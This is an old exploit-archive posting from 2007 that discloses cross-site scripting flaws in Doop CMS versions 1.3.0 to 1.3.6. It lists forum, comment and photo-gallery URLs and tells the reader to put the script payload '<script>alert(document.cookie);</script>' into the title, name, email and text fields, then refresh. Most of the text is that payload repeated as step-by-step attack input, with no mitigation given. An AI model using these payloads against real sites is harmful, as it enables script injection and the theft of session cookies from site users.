Home / os / solaris

doopCMS13x-xss.txt

Posted on 13 April 2007

Doop Content Management System 1.3.x Exploit ################################################## ########################## Author: KaBuS <KaBuS [at] KabusTr.com - Www.KabusTr.coM Software : http://mydoop.org/ Download : http://mydoop.org/downloads/ ################################################## ########################## doop 1.3.0 doop 1.3.5 doop 1.3.6 Attack 1 : http://site/path/index.php?page=forum New/Reply Topic : Title: <script>alert(document.cookie);</script><script>alert(/xss/);</script> Text: <script>alert(document.cookie);</script><script>alert(/xss/);</script> Name or nick: <script>alert(document.cookie);</script><script>alert(/xss/);</script> e-mail: <script>alert(document.cookie);</script><script>alert(/xss/);</script> send. and refresh page .. Attack 2 : http://site/path/?page=vdasCMS New Comment: <script>alert(document.cookie);</script><script>alert(/xss/);</script> Name: <script>alert(document.cookie);</script><script>alert(/xss/);</script> Email: <script>alert(document.cookie);</script><script>alert(/xss/);</script> Text: <script>alert(document.cookie);</script><script>alert(/xss/);</script> send. and refresh page .. Attack 3 : in photogallery page http://site/path/index.php?page=photos http://site/path/index.php?page=[XSS] example : <script>alert(document.cookie);</script><script>alert(/xss/);</script> ################################################## ########################## KaBuS - KabusTr.coM - Ataturk'un izinde Turkiye'nin Hizmetindeyiz.. since 2005 ################################################## ########################## _________________________________________________________________ Download Messenger. Join the i

 

TOP